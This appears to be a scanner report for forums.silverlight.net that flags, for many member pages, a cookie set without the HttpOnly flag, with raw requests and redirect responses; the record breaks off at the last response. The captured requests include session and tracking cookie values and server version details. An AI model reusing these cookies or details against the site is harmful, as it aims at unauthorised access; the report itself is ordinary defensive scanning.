CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Shi-Ding-_2D00_-MSFT.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 248 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2D00_-MSFT.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:00 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fShi-Ding-_2 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:17 GMT; expires=Sun, 29-Jan-2012 23:16:17 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Skyrunner.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:17 GMT; expires=Sun, 29-Jan-2012 23:16:17 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:18 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fSkyrunner.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:27 GMT; expires=Sun, 29-Jan-2012 23:16:27 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/TimeBandit.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:27 GMT; expires=Sun, 29-Jan-2012 23:16:27 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:28 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fTimeBandit. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Xpert360.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 236 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:01 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fXpert360.as ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/_2D002D00_Will_2D002D00_.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 252 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_Will_2D002D00_.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:04 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2f_2D002D00_W ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:01 GMT; expires=Sun, 29-Jan-2012 23:16:01 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/abeaulieu.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:01 GMT; expires=Sun, 29-Jan-2012 23:16:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:01 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fabeaulieu.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/alt_5F00_fo.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 239 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:10 GMT; expires=Sun, 29-Jan-2012 23:17:10 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/billb08.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 235 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:10 GMT; expires=Sun, 29-Jan-2012 23:17:10 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:11 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.asp ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/bradsevertson.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 241 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradsevertson.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:34 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradseverts ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/brucemcmillan.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 241 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmillan.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:22 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmill ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:36 GMT; expires=Sun, 29-Jan-2012 23:16:36 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/clintong.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 236 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:36 GMT; expires=Sun, 29-Jan-2012 23:16:36 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:36 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.as ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/dhook.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 233 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:21 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx" ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/emil.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 232 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:04 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx"> ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:20 GMT; expires=Sun, 29-Jan-2012 23:41:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/gary-frank.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:20 GMT; expires=Sun, 29-Jan-2012 23:41:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:41:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/houmie.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
